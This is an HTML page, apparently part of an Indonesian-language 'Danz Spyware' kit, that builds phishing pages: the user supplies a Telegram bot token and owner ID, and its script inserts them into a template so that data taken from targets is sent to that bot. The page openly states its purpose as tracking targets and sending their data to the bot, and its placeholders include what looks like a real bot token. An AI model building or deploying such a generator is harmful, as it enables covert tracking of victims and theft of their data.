<!DOCTYPE html>
<html>
<head>
  <title>create your phising</title>
  <style>
    body {
      background: #000;
      color: red;
      font-family: monospace;
      text-align: center;
      padding-top: 50px;
    }
    input {
      padding: 10px;
      margin: 10px;
      width: 300px;
      border: 2px solid red;
      border-radius: 10px;
      background: black;
      color: red;
    }
    button {
      padding: 10px 20px;
      border: none;
      background: red;
      color: white;
      border-radius: 10px;
      cursor: pointer;
    }
    #loader {
      display: none;
      margin-top: 20px;
    }
  </style>
</head>
<body>
  <h1>Danz Spyware</h1>
  <h1>!!!Tools Spyware / Phising,Yang Tujuannya Untuk Melacak Target Dan Data Dikirim Ke bot,tidak 100% akurat!!!</h1>  
  <img src="https://files.catbox.moe/3zfugo.png" width="150"><br><br>
  <input type="text" id="token" placeholder="8298409773:AAGzRBLRZ2orVm7uqE1Ugxcv1hgKMSGYs3I"><br>
  <input type="text" id="owner" placeholder="7268009559"><br>
  <button onclick="buat()">Buat Kode Phising</button>

  <div id="loader">⏳ Membuat...</div>

  <script>
    async function buat() {
      const token = document.getElementById("token").value;
      const owner = document.getElementById("owner").value;

      if (!token || !owner) return alert("Token dan ID wajib diisi!");

      document.getElementById("loader").style.display = "block";

      const template = await fetch("template.html").then(r => r.text());
      const final = template
        .replace(/__TOKEN__/g, token)
        .replace(/__OWNER_ID__/g, owner);

      const blob = new Blob([final], { type: "text/html" });
      const url = URL.createObjectURL(blob);

      window.location.href = `hasil.html?file=${encodeURIComponent(url)}`;
    }
  </script>
</body>
</html>